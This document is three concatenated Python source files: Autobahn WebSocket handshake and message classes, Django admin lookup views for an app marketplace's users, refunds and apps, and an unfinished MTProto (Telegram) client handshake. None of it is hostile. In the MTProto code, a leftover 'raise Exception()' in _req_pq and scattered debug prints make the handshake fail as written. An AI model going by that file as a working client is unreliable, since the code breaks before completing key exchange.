:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: list of str
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: list of str
"""
self.peer = peer
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
def __json__(self):
return {'peer': self.peer,
'headers': self.headers,
'host': self.host,
'path': self.path,
'params': self.params,
'version': self.version,
'origin': self.origin,
'protocols': self.protocols,
'extensions': self.extensions}
def __str__(self):
return json.dumps(self.__json__())
class ConnectionResponse(object):
"""
Thin-wrapper for WebSocket connection response information provided in
:meth:`autobahn.websocket.protocol.WebSocketClientProtocol.onConnect` when
a WebSocket server has accepted a connection request by a client.
"""
__slots__ = (
'peer',
'headers',
'version',
'protocol',
'extensions'
)
def __init__(self, peer, headers, version, protocol, extensions):
"""
Constructor.
:param peer: Descriptor of the connected server (e.g. IP address/port in case of TCP transport).
:type peer: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: list of str
"""
self.peer = peer
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def __json__(self):
return {'peer': self.peer,
'headers': self.headers,
'version': self.version,
'protocol': self.protocol,
'extensions': self.extensions}
def __str__(self):
return json.dumps(self.__json__())
class ConnectionAccept(object):
"""
Used by WebSocket servers to accept an incoming WebSocket connection.
If the client announced one or multiple subprotocols, the server MUST
select one of the subprotocols announced by the client.
"""
__slots__ = ('subprotocol', 'headers')
def __init__(self, subprotocol=None, headers=None):
"""
:param subprotocol: The WebSocket connection is accepted with the
this WebSocket subprotocol chosen. The value must be a token
as defined by RFC 2616.
:type subprotocol: unicode or None
:param headers: Additional HTTP headers to send on the WebSocket
opening handshake reply, e.g. cookies. The keys must be unicode,
and the values either unicode or tuple/list. In the latter case
a separate HTTP header line will be sent for each item in
tuple/list.
:type headers: dict or None
"""
assert(subprotocol is None or type(subprotocol) == six.text_type)
assert(headers is None or type(headers) == dict)
if headers is not None:
for k, v in headers.items():
assert(type(k) == six.text_type)
assert(type(v) == six.text_type or type(v) == list or type(v) == tuple)
if type(v) == list or type(v) == tuple:
for vv in v:
assert(type(vv) == six.text_type)
self.subprotocol = subprotocol
self.headers = headers
class ConnectionDeny(Exception):
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.protocol.WebSocketServerProtocol.onConnect`.
"""
__slots__ = ('code', 'reason')
BAD_REQUEST = 400
"""
Bad Request. The request cannot be fulfilled due to bad syntax.
"""
FORBIDDEN = 403
"""
Forbidden. The request was a legal request, but the server is refusing to respond to it.[2] Unlike a 401 Unauthorized response, authenticating will make no difference.
"""
NOT_FOUND = 404
"""
Not Found. The requested resource could not be found but may be available again in the future.[2] Subsequent requests by the client are permissible.
"""
NOT_ACCEPTABLE = 406
"""
Not Acceptable. The requested resource is only capable of generating content not acceptable according to the Accept headers sent in the request.
"""
REQUEST_TIMEOUT = 408
"""
Request Timeout. The server timed out waiting for the request. According to W3 HTTP specifications: 'The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.
"""
INTERNAL_SERVER_ERROR = 500
"""
Internal Server Error. A generic error message, given when no more specific message is suitable.
"""
NOT_IMPLEMENTED = 501
"""
Not Implemented. The server either does not recognize the request method, or it lacks the ability to fulfill the request.
"""
SERVICE_UNAVAILABLE = 503
"""
Service Unavailable. The server is currently unavailable (because it is overloaded or down for maintenance). Generally, this is a temporary state.
"""
def __init__(self, code, reason=None):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: unicode
"""
assert(type(code) == int)
assert(reason is None or type(reason) == six.text_type)
self.code = code
self.reason = reason
class Message(object):
"""
Abstract base class for WebSocket messages.
"""
__slots__ = ()
class IncomingMessage(Message):
"""
An incoming WebSocket message.
"""
__slots__ = ('payload', 'is_binary')
def __init__(self, payload, is_binary=False):
"""
:param payload: The WebSocket message payload, which can be UTF-8
encoded text or a binary string.
:type payload: bytes
:param is_binary: ``True`` iff payload is binary, else the payload
contains UTF-8 encoded text.
:type is_binary: bool
"""
assert(type(payload) == bytes)
assert(type(is_binary) == bool)
self.payload = payload
self.is_binary = is_binary
class OutgoingMessage(Message):
"""
An outgoing WebSocket message.
"""
__slots__ = ('payload', 'is_binary', 'dont_compress')
def __init__(self, payload, is_binary=False, dont_compress=False):
"""
:param payload: The WebSocket message payload, which can be UTF-8
encoded text or a binary string.
:type payload: bytes
:param is_binary: ``True`` iff payload is binary, else the payload
contains UTF-8 encoded text.
:type is_binary: bool
:param dont_compress: Iff ``True``, never compress this message.
This only has an effect when WebSocket compression has been negotiated
on the WebSocket connection. Use when you know the payload is
incompressible (e.g. encrypted or already compressed).
:type dont_compress: bool
"""
assert(type(payload) == bytes)
assert(type(is_binary) == bool)
assert(type(dont_compress) == bool)
self.payload = payload
self.is_binary = is_binary
self.dont_compress = dont_compress
class Ping(object):
"""
A WebSocket ping message.
"""
__slots__ = ('payload')
def __init__(self, payload=None):
"""
:param payload: The WebSocket ping message payload.
:type payload: bytes or None
"""
assert(payload is None or type(payload) == bytes), \
("invalid type {} for WebSocket ping payload - must be None or bytes".format(type(payload)))
if payload is not None:
assert(len(payload) < 126), \
("WebSocket ping payload too long ({} bytes) - must be <= 125 bytes".format(len(payload)))
self.payload = payload
|
|
import json
import uuid
from datetime import datetime, timedelta
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import connection
from django.db.models import Count, Q, Sum
from django.http import Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.http import require_POST
import commonware.log
from babel import numbers
from elasticsearch_dsl import Q as ES_Q, query
from slumber.exceptions import HttpClientError, HttpServerError
from tower import ugettext as _
import mkt
import mkt.constants.lookup as lkp
from lib.pay_server import client
from mkt.access import acl
from mkt.account.utils import purchase_list
from mkt.api.authorization import GroupPermission
from mkt.constants.payments import (COMPLETED, FAILED, PENDING, PROVIDER_BANGO,
PROVIDER_LOOKUP, SOLITUDE_REFUND_STATUSES)
from mkt.developers.models import ActivityLog, AddonPaymentAccount
from mkt.developers.providers import get_provider
from mkt.developers.utils import prioritize_app
from mkt.developers.views_payments import _redirect_to_bango_portal
from mkt.lookup.forms import (APIFileStatusForm, APIStatusForm, DeleteUserForm,
TransactionRefundForm, TransactionSearchForm,
PromoImgForm)
from mkt.lookup.serializers import AppLookupSerializer, WebsiteLookupSerializer
from mkt.prices.models import AddonPaymentData, Refund
from mkt.purchase.models import Contribution
from mkt.reviewers.models import QUEUE_TARAKO
from mkt.search.filters import SearchQueryFilter
from mkt.search.views import SearchView
from mkt.site.decorators import json_view, permission_required
from mkt.site.utils import paginate
from mkt.tags.models import attach_tags
from mkt.users.models import UserProfile
from mkt.webapps.models import Webapp
from mkt.websites.models import Website
from mkt.websites.forms import WebsiteForm
from mkt.websites.views import WebsiteSearchView
log = commonware.log.getLogger('z.lookup')
@permission_required([('Lookup', 'View')])
def home(request):
tx_form = TransactionSearchForm()
return render(request, 'lookup/home.html', {'tx_form': tx_form})
@permission_required([('AccountLookup', 'View')])
def user_summary(request, user_id):
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
app_summary = _app_summary(user.pk)
# All refunds that this user has requested (probably as a consumer).
req = Refund.objects.filter(contribution__user=user)
# All instantly-approved refunds that this user has requested.
appr = req.filter(status=mkt.REFUND_APPROVED_INSTANT)
refund_summary = {'approved': appr.count(),
'requested': req.count()}
user_addons = user.addons.order_by('-created')
user_addons = paginate(request, user_addons, per_page=15)
payment_data = (AddonPaymentData.objects.filter(addon__authors=user)
.values(*AddonPaymentData.address_fields())
.distinct())
# If the user is deleted, get the log detailing the delete.
try:
delete_log = ActivityLog.objects.for_user(user).filter(
action=mkt.LOG.DELETE_USER_LOOKUP.id)[0]
except IndexError:
delete_log = None
provider_portals = get_payment_provider_portals(user=user)
return render(request, 'lookup/user_summary.html',
{'account': user, 'app_summary': app_summary,
'delete_form': DeleteUserForm(), 'delete_log': delete_log,
'is_admin': is_admin, 'refund_summary': refund_summary,
'user_addons': user_addons, 'payment_data': payment_data,
'provider_portals': provider_portals})
@permission_required([('AccountLookup', 'View')])
def user_delete(request, user_id):
delete_form = DeleteUserForm(request.POST)
if not delete_form.is_valid():
messages.error(request, delete_form.errors)
return HttpResponseRedirect(reverse('lookup.user_summary',
args=[user_id]))
user = get_object_or_404(UserProfile, pk=user_id)
user.deleted = True
user.save() # Must call the save function to delete user.
mkt.log(mkt.LOG.DELETE_USER_LOOKUP, user,
details={'reason': delete_form.cleaned_data['delete_reason']},
user=request.user)
return HttpResponseRedirect(reverse('lookup.user_summary', args=[user_id]))
@permission_required([('Transaction', 'View')])
def transaction_summary(request, tx_uuid):
tx_data = _transaction_summary(tx_uuid)
if not tx_data:
raise Http404
tx_form = TransactionSearchForm()
tx_refund_form = TransactionRefundForm()
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_form': tx_form,
'tx_refund_form': tx_refund_form}.items() +
tx_data.items()))
def _transaction_summary(tx_uuid):
"""Get transaction details from Solitude API."""
contrib = get_object_or_404(Contribution, uuid=tx_uuid)
contrib_id = contrib.transaction_id
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
lookup = {'status': True, 'transaction': True}
pay = {}
try:
pay = client.api.generic.transaction.get_object_or_404(uuid=contrib_id)
except ObjectDoesNotExist:
log.warning('Transaction not found in solitude: {0}'.format(tx_uuid))
lookup['transaction'] = False
if pay.get('provider') == PROVIDER_BANGO:
# If we are processing a Bango refund, then support would also like to
# know the package id.
try:
pay['package_id'] = (client.api.by_url(pay['seller'])
.get_object_or_404()['bango']['package_id'])
except (KeyError, ObjectDoesNotExist):
log.warning('Failed to find Bango package_id: {0}'.format(tx_uuid))
# Get refund status.
refund_status = None
if refund_contrib and refund_contrib.refund.status == mkt.REFUND_PENDING:
try:
status = client.api.bango.refund.get_object_or_404(
data={'uuid': refund_contrib.transaction_id})
refund_status = SOLITUDE_REFUND_STATUSES[status['status']]
except (KeyError, HttpServerError):
lookup['status'] = False
log.warning('Refund lookup failed: {0}'.format(tx_uuid))
return {
# Solitude data.
'lookup': lookup,
'amount': pay.get('amount'),
'currency': pay.get('currency'),
'package_id': pay.get('package_id'),
'provider': PROVIDER_LOOKUP.get(pay.get('provider')),
'refund_status': refund_status,
'support': pay.get('uid_support'),
'timestamp': pay.get('created'),
# Zamboni data.
'app': contrib.addon,
'contrib': contrib,
'related': contrib.related,
'type': mkt.CONTRIB_TYPES.get(contrib.type, _('Incomplete')),
# Filter what is refundable.
'is_refundable': ((contrib.type == mkt.CONTRIB_PURCHASE) and
not refund_contrib),
}
@require_POST
@permission_required([('Transaction', 'Refund')])
def transaction_refund(request, tx_uuid):
contrib = get_object_or_404(Contribution, uuid=tx_uuid,
type=mkt.CONTRIB_PURCHASE)
refund_contribs = contrib.get_refund_contribs()
refund_contrib = refund_contribs[0] if refund_contribs.exists() else None
if refund_contrib:
messages.error(request, _('A refund has already been processed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
form = TransactionRefundForm(request.POST)
if not form.is_valid():
return render(request, 'lookup/transaction_summary.html',
dict({'uuid': tx_uuid, 'tx_refund_form': form,
'tx_form': TransactionSearchForm()}.items() +
_transaction_summary(tx_uuid).items()))
data = {'uuid': contrib.transaction_id,
'manual': form.cleaned_data['manual']}
if settings.BANGO_FAKE_REFUNDS:
data['fake_response_status'] = {'responseCode':
form.cleaned_data['fake']}
try:
res = client.api.bango.refund.post(data)
except (HttpClientError, HttpServerError):
# Either doing something not supposed to or Solitude had an issue.
log.exception('Refund error: %s' % tx_uuid)
messages.error(
request,
_('You cannot make a refund request for this transaction.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
if res['status'] in [PENDING, COMPLETED]:
# Create refund Contribution by cloning the payment Contribution.
refund_contrib = Contribution.objects.get(id=contrib.id)
refund_contrib.id = None
refund_contrib.save()
log.info('Creating refund transaction from: {0} '
'with transaction_id of: {1}'
.format(contrib.id, res['uuid']))
refund_contrib.update(
type=mkt.CONTRIB_REFUND, related=contrib,
uuid=str(uuid.uuid4()),
amount=-refund_contrib.amount if refund_contrib.amount else None,
transaction_id=res['uuid'])
if res['status'] == PENDING:
# Create pending Refund.
refund_contrib.enqueue_refund(
mkt.REFUND_PENDING, request.user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund pending: %s' % tx_uuid)
messages.success(
request, _('Refund for this transaction now pending.'))
elif res['status'] == COMPLETED:
# Create approved Refund.
refund_contrib.enqueue_refund(
mkt.REFUND_APPROVED, request.user,
refund_reason=form.cleaned_data['refund_reason'])
log.info('Refund approved: %s' % tx_uuid)
messages.success(
request, _('Refund for this transaction successfully approved.'))
elif res['status'] == FAILED:
# Bango no like.
log.error('Refund failed: %s' % tx_uuid)
messages.error(
request, _('Refund request for this transaction failed.'))
return redirect(reverse('lookup.transaction_summary', args=[tx_uuid]))
@permission_required([('AppLookup', 'View')])
def app_summary(request, addon_id):
app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
if request.FILES:
promo_img_form = PromoImgForm(request.POST, request.FILES)
else:
promo_img_form = PromoImgForm()
if 'promo_img' in request.FILES and promo_img_form.is_valid():
promo_img_form.save(app)
messages.success(request, 'Promo image successfully uploaded.')
return redirect(reverse('lookup.app_summary', args=[app.pk]))
if 'prioritize' in request.POST and not app.priority_review:
prioritize_app(app, request.user)
authors = (app.authors.filter(addonuser__role__in=(mkt.AUTHOR_ROLE_DEV,
mkt.AUTHOR_ROLE_OWNER))
.order_by('display_name'))
if app.premium and app.premium.price:
price = app.premium.price
else:
price = None
purchases, refunds = _app_purchases_and_refunds(app)
provider_portals = get_payment_provider_portals(app=app)
versions = None
status_form = APIStatusForm(initial={
'status': mkt.STATUS_CHOICES_API[app.status]
})
version_status_forms = {}
if app.is_packaged:
versions = app.versions.all().order_by('-created')
for v in versions:
version_status_forms[v.pk] = APIFileStatusForm(initial={
'status': mkt.STATUS_CHOICES_API[v.all_files[0].status]
})
permissions = {}
if app.latest_version:
permissions = app.latest_version.manifest.get('permissions', {})
return render(request, 'lookup/app_summary.html', {
'abuse_reports': app.abuse_reports.count(), 'app': app,
'authors': authors, 'purchases': purchases, 'refunds': refunds,
'price': price, 'provider_portals': provider_portals,
'status_form': status_form, 'versions': versions,
'is_tarako': app.tags.filter(tag_text=QUEUE_TARAKO).exists(),
'tarako_review':
app.additionalreview_set.latest_for_queue(QUEUE_TARAKO),
'version_status_forms': version_status_forms,
'permissions': permissions,
'promo_img_form': promo_img_form,
})
@permission_required([('WebsiteLookup', 'View')])
def website_summary(request, addon_id):
website = get_object_or_404(Website, pk=addon_id)
if request.FILES:
promo_img_form = PromoImgForm(request.POST, request.FILES)
else:
promo_img_form = PromoImgForm()
if 'promo_img' in request.FILES and promo_img_form.is_valid():
promo_img_form.save(website)
messages.success(request, 'Promo image successfully uploaded.')
return redirect(reverse('lookup.website_summary', args=[website.pk]))
if not hasattr(website, 'keywords_list'):
attach_tags([website])
return render(request, 'lookup/website_summary.html', {
'website': website,
'promo_img_form': promo_img_form,
})
@permission_required([('WebsiteLookup', 'View')])
def website_edit(request, addon_id):
website = get_object_or_404(Website, pk=addon_id)
form = WebsiteForm(request.POST or None, request=request, instance=website)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Website saved.'))
return redirect(
reverse('lookup.website_summary', args=[website.pk]))
return render(request, 'lookup/website_edit.html', {
'website': website,
'form': form,
})
@permission_required([('AccountLookup', 'View')])
def app_activity(request, addon_id):
"""Shows the app activity age for single app."""
app = get_object_or_404(Webapp.with_deleted, pk=addon_id)
user_items = ActivityLog.objects.for_apps([app]).exclude(
action__in=mkt.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_apps([app]).filter(
action__in=mkt.LOG_HIDE_DEVELOPER)
user_items = paginate(request, user_items, per_page=20)
admin_items = paginate(request, admin_items, per_page=20)
return render(request, 'lookup/app_activity.html', {
'admin_items': admin_items, 'app': app, 'user_items': user_items})
@permission_required([('BangoPortal', 'Redirect')])
def bango_portal_from_package(request, package_id):
response = _redirect_to_bango_portal(package_id,
'package_id: %s' % package_id)
if 'Location' in response:
return HttpResponseRedirect(response['Location'])
else:
message = (json.loads(response.content)
.get('__all__', response.content)[0])
messages.error(request, message)
return HttpResponseRedirect(reverse('lookup.home'))
@permission_required([('AccountLookup', 'View')])
def user_purchases(request, user_id):
"""Shows the purchase page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
products = purchase_list(request, user)
return render(request, 'lookup/user_purchases.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'single': bool(None), 'show_link': False})
@permission_required([('AccountLookup', 'View')])
def user_activity(request, user_id):
"""Shows the user activity page for another user."""
user = get_object_or_404(UserProfile, pk=user_id)
products = purchase_list(request, user)
is_admin = acl.action_allowed(request, 'Users', 'Edit')
user_items = ActivityLog.objects.for_user(user).exclude(
action__in=mkt.LOG_HIDE_DEVELOPER)
admin_items = ActivityLog.objects.for_user(user).filter(
action__in=mkt.LOG_HIDE_DEVELOPER)
mkt.log(mkt.LOG.ADMIN_VIEWED_LOG, request.user, user=user)
return render(request, 'lookup/user_activity.html',
{'pager': products, 'account': user, 'is_admin': is_admin,
'single': bool(None),
'user_items': user_items, 'admin_items': admin_items,
'show_link': False})
def _expand_query(q, fields):
should = []
for field in fields:
should.append(ES_Q('term', **{field: {'value': q, 'boost': 10}}))
should.append(ES_Q('match', **{field: {'query': q, 'boost': 4,
'type': 'phrase'}}))
should.append(ES_Q('match', **{field: {'query': q, 'boost': 3}}))
should.append(ES_Q('fuzzy', **{field: {'value': q, 'boost': 2,
'prefix_length': 4}}))
should.append(ES_Q('prefix', **{field: {'value': q, 'boost': 1.5}}))
return query.Bool(should=should)
@permission_required([('AccountLookup', 'View')])
@json_view
def user_search(request):
results = []
q = request.GET.get('q', u'').lower().strip()
search_fields = ('fxa_uid', 'display_name', 'email')
fields = ('id',) + search_fields
if q.isnumeric():
# id is added implictly by the ES filter. Add it explicitly:
qs = UserProfile.objects.filter(pk=q).values(*fields)
else:
qs = UserProfile.objects.all()
filters = Q()
for field in search_fields:
filters = filters | Q(**{'%s__icontains' % field: q})
qs = qs.filter(filters)
qs = qs.values(*fields)
qs = _slice_results(request, qs)
for user in qs:
user['url'] = reverse('lookup.user_summary', args=[user['id']])
results.append(user)
return {'objects': results}
@permission_required([('Transaction', 'View')])
def transaction_search(request):
tx_form = TransactionSearchForm(request.GET)
if tx_form.is_valid():
return redirect(reverse('lookup.transaction_summary',
args=[tx_form.cleaned_data['q']]))
else:
return render(request, 'lookup/home.html', {'tx_form': tx_form})
class AppLookupSearchView(SearchView):
permission_classes = [GroupPermission('AppLookup', 'View')]
filter_backends = [SearchQueryFilter]
serializer_class = AppLookupSerializer
paginate_by = lkp.SEARCH_LIMIT
max_paginate_by = lkp.MAX_RESULTS
def get_paginate_by(self, *args, **kwargs):
if self.request.GET.get(self.paginate_by_param) == 'max':
return self.max_paginate_by
else:
return super(AppLookupSearchView, self).get_paginate_by(*args,
**kwargs)
class WebsiteLookupSearchView(WebsiteSearchView):
permission_classes = [GroupPermission('WebsiteLookup', 'View')]
filter_backends = [SearchQueryFilter]
serializer_class = WebsiteLookupSerializer
paginate_by = lkp.SEARCH_LIMIT
max_paginate_by = lkp.MAX_RESULTS
def get_paginate_by(self, *args, **kwargs):
if self.request.GET.get(self.paginate_by_param) == 'max':
return self.max_paginate_by
else:
return super(WebsiteLookupSearchView,
self).get_paginate_by(*args, **kwargs)
def _app_summary(user_id):
sql = """
select currency,
sum(case when type=%(purchase)s then 1 else 0 end)
as app_total,
sum(case when type=%(purchase)s then amount else 0.0 end)
as app_amount
from stats_contributions
where user_id=%(user_id)s
group by currency
"""
cursor = connection.cursor()
cursor.execute(sql, {'user_id': user_id,
'purchase': mkt.CONTRIB_PURCHASE})
summary = {'app_total': 0,
'app_amount': {}}
cols = [cd[0] for cd in cursor.description]
while 1:
row = cursor.fetchone()
if not row:
break
row = dict(zip(cols, row))
for cn in cols:
if cn.endswith('total'):
summary[cn] += row[cn]
elif cn.endswith('amount'):
summary[cn][row['currency']] = row[cn]
return summary
def _app_purchases_and_refunds(addon):
purchases = {}
now = datetime.now()
base_qs = (Contribution.objects.values('currency')
.annotate(total=Count('id'),
amount=Sum('amount'))
.filter(addon=addon)
.exclude(type__in=[mkt.CONTRIB_REFUND,
mkt.CONTRIB_CHARGEBACK,
mkt.CONTRIB_PENDING]))
for typ, start_date in (('last_24_hours', now - timedelta(hours=24)),
('last_7_days', now - timedelta(days=7)),
('alltime', None),):
qs = base_qs.all()
if start_date:
qs = qs.filter(created__gte=start_date)
sums = list(qs)
purchases[typ] = {'total': sum(s['total'] for s in sums),
'amounts': [numbers.format_currency(s['amount'],
s['currency'])
for s in sums if s['currency']]}
refunds = {}
rejected_q = Q(status=mkt.REFUND_DECLINED) | Q(status=mkt.REFUND_FAILED)
qs = Refund.objects.filter(contribution__addon=addon)
refunds['requested'] = qs.exclude(rejected_q).count()
percent = 0.0
total = purchases['alltime']['total']
if total:
percent = (refunds['requested'] / float(total)) * 100.0
refunds['percent_of_purchases'] = '%.1f%%' % percent
refunds['auto-approved'] = (qs.filter(status=mkt.REFUND_APPROVED_INSTANT)
.count())
refunds['approved'] = qs.filter(status=mkt.REFUND_APPROVED).count()
refunds['rejected'] = qs.filter(rejected_q).count()
return purchases, refunds
def _slice_results(request, qs):
if request.GET.get('limit') == 'max':
return qs[:lkp.MAX_RESULTS]
else:
return qs[:lkp.SEARCH_LIMIT]
def get_payment_provider_portals(app=None, user=None):
"""
Get a list of dicts describing the payment portals for this app or user.
Either app or user is required.
"""
provider_portals = []
if app:
q = dict(addon=app)
elif user:
q = dict(payment_account__user=user)
else:
raise ValueError('user or app is required')
for acct in (AddonPaymentAccount.objects.filter(**q)
.select_related('payment_account')):
provider = get_provider(id=acct.payment_account.provider)
portal_url = provider.get_portal_url(acct.addon.app_slug)
if portal_url:
provider_portals.append({
'provider': provider,
'app': acct.addon,
'portal_url': portal_url,
'payment_account': acct.payment_account
})
return provider_portals
|
|
import os
import asyncio
import sys
from random import SystemRandom
from io import BytesIO
from socket import socket
from time import time
from collections import namedtuple
from struct import Struct
from urllib.parse import urlsplit
from queue import Queue
from Crypto.PublicKey import RSA
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes
from . util import to_hex, crc32
from . crypt import SHA1
from . import crypt
from . import prime
from . import tl
from . import dc
from . import scheme
from . session import MTProtoSessionData
from . authkey import MTProtoAuthKey, aes_encrypt, aes_decrypt
from .log import log
from .transports import MTProtoTransport
class MTProtoOld:
def __init__(self, api_secret, api_id, rsa_key):
self.api_secret = api_secret
self.api_id = api_id
self.dc = Datacenter(0, Datacenter.DCs_test[1], 443, rsa_key)
class Datacenter:
DATA_VERSION = 4
DCs = [
"149.154.175.50",
"149.154.167.51",
"149.154.175.100",
"149.154.167.91",
"149.154.171.5",
]
DCs_ipv6 = [
"2001:b28:f23d:f001::a",
"2001:67c:4e8:f002::a",
"2001:b28:f23d:f003::a",
"2001:67c:4e8:f004::a",
"2001:b28:f23f:f005::a",
]
DCs_test = [
"149.154.175.10",
"149.154.167.40",
"149.154.175.117",
]
DCs_test_ipv6 = [
"2001:b28:f23d:f001::e",
"2001:67c:4e8:f002::e",
"2001:b28:f23d:f003::e",
]
def __init__(self, dc_id, ipaddr, port, rsa_key):
self.random = SystemRandom()
self.session_id = None
self.resPQ = None
self.p_q_inner_data = None
self.server_DH_params = None
self.server_DH_inner_data = None
self.client_DH_inner_data = None
tmp_aes_key = None
tmp_aes_iv = None
self.set_client_DH_params_answer = None
self.ipaddr = ipaddr
self.port = port
self.datacenter_id = dc_id
self.auth_server_salt_set = []
self._socket = socket()
self._socket.connect((ipaddr, port))
self._socket.settimeout(5.0)
self.socket = self._socket.makefile(mode='rwb', buffering=0)
self.message_queue = []
self.last_message_id = 0
self.timedelta = 0
self.number = 0
self.authorized = False
self.auth_key = MTProtoAuthKey()
self.server_salt = None
self.server_time = None
self.MAX_RETRY = 5
self.AUTH_MAX_RETRY = 5
self.rsa_key = rsa_key
self.b = self.random.getrandbits(2048)
# Handshake
self.create_auth_key()
# self.test_api()
def test_api(self):
getNearestDc = tl.help_getNearestDc()
print(getNearestDc)
self.send_encrypted_message(getNearestDc.to_bytes())
self.recv_encrypted_message()
# nearestDc = tl.NearestDc(self.recv_plaintext_message(True))
# print(nearestDc)
"""
g = public (prime) base, known to Alice, Bob, and Eve. g = 5
p = public (prime) number, known to Alice, Bob, and Eve. p = 23
a = Alice's private key, known only to Alice. a = 6
b = Bob's private key known only to Bob. b = 15
"""
def _req_pq(self):
nonce = tl.int128_c(self.random.getrandbits(128))
request = tl.req_pq(nonce)
# raise Exception()
self.send_plaintext_message(request.to_bytes())
res_pq = tl.ResPQ.from_stream(BytesIO(self.recv_plaintext_message()))
# print(res_pq, ...)
raise Exception()
assert nonce == res_pq.nonce
return res_pq
def _create_p_q_inner_data(self):
pq = self.resPQ.pq.to_int('big')
p, q = prime.primefactors(pq)
if p > q:
p, q = q, p
assert p * q == pq and p < q
p_string = tl.string_c.from_int(p, byteorder='big')
q_string = tl.string_c.from_int(q, byteorder='big')
new_nonce = tl.int256_c(self.random.getrandbits(256))
p_q_inner_data = tl.p_q_inner_data_c(pq=self.resPQ.pq, p=p_string, q=q_string, nonce=self.resPQ.nonce, server_nonce=self.resPQ.server_nonce, new_nonce=new_nonce)
assert p_q_inner_data.nonce == self.resPQ.nonce
return p_q_inner_data
def _req_DH_params(self):
key = RSA.importKey(self.rsa_key.strip())
public_key_fingerprint = self.resPQ.server_public_key_fingerprints[0]
data = self.p_q_inner_data.to_boxed_bytes()
sha_digest = SHA1(data)
# get padding of random data to fill what is left after data and sha_digest
random_bytes = os.urandom(255 - len(data) - len(sha_digest))
to_encrypt = sha_digest + data + random_bytes # encrypt cat of sha_digest, data, and padding
encrypted_data = tl.string_c(key.encrypt(to_encrypt, 0)[0]) # rsa encrypt (key == RSA.key)
# Presenting proof of work; Server authentication
req_DH_params = tl.req_DH_params(nonce=self.p_q_inner_data.nonce,
server_nonce=self.p_q_inner_data.server_nonce,
p=self.p_q_inner_data.p, q=self.p_q_inner_data.q,
public_key_fingerprint=public_key_fingerprint,
encrypted_data=encrypted_data)
self.send_plaintext_message(req_DH_params.to_bytes())
server_DH_params = tl.Server_DH_Params.from_stream(BytesIO(self.recv_plaintext_message()))
assert server_DH_params.number == tl.server_DH_params_ok_c.number, "failed to get params"
assert self.resPQ.nonce == server_DH_params.nonce
assert self.resPQ.server_nonce == server_DH_params.server_nonce
return server_DH_params
def _create_tmp_aes_keys(self):
tmp_aes_key = SHA1(self.p_q_inner_data.new_nonce.to_bytes() + self.server_DH_params.server_nonce.to_bytes())
tmp_aes_key += SHA1(self.server_DH_params.server_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())[:12]
tmp_aes_iv = SHA1(self.server_DH_params.server_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())[12:20]
tmp_aes_iv += SHA1(self.p_q_inner_data.new_nonce.to_bytes() + self.p_q_inner_data.new_nonce.to_bytes())
tmp_aes_iv += self.p_q_inner_data.new_nonce.to_bytes()[0:4]
return tmp_aes_key, tmp_aes_iv
def _decrypt_Server_DH_inner_data(self):
answer_with_hash = crypt.ige_decrypt(self.server_DH_params.encrypted_answer, self.tmp_aes_key, self.tmp_aes_iv)
answer = answer_with_hash[20:] # decrypted at this point
server_DH_inner_data = tl.Server_DH_inner_data.from_stream(BytesIO(answer))
assert self.server_DH_params.nonce == server_DH_inner_data.nonce
assert self.server_DH_params.server_nonce == server_DH_inner_data.server_nonce
return server_DH_inner_data
def _create_client_DH_inner_data(self):
dh_prime = self.server_DH_inner_data.dh_prime.to_int(byteorder='big')
g = self.server_DH_inner_data.g
g_a = self.server_DH_inner_data.g_a.to_int(byteorder='big')
server_time = self.server_DH_inner_data.server_time
self.timedelta = server_time - time() # keep in mind delta is used somewhere later
assert prime.isprime(dh_prime)
retry_id = tl.long_c(0)
b = self.b
g_b = pow(g, b, dh_prime)
g_b_str = tl.bytes_c.from_int(g_b, byteorder='big')
client_DH_inner_data = tl.client_DH_inner_data_c(
nonce=self.server_DH_inner_data.nonce,
server_nonce=self.server_DH_inner_data.server_nonce,
retry_id=retry_id,
g_b=g_b_str)
return client_DH_inner_data
def create_auth_key(self):
self.resPQ = self._req_pq()
print(self.resPQ)
self.p_q_inner_data = self._create_p_q_inner_data()
print(self.p_q_inner_data)
self.server_DH_params = self._req_DH_params()
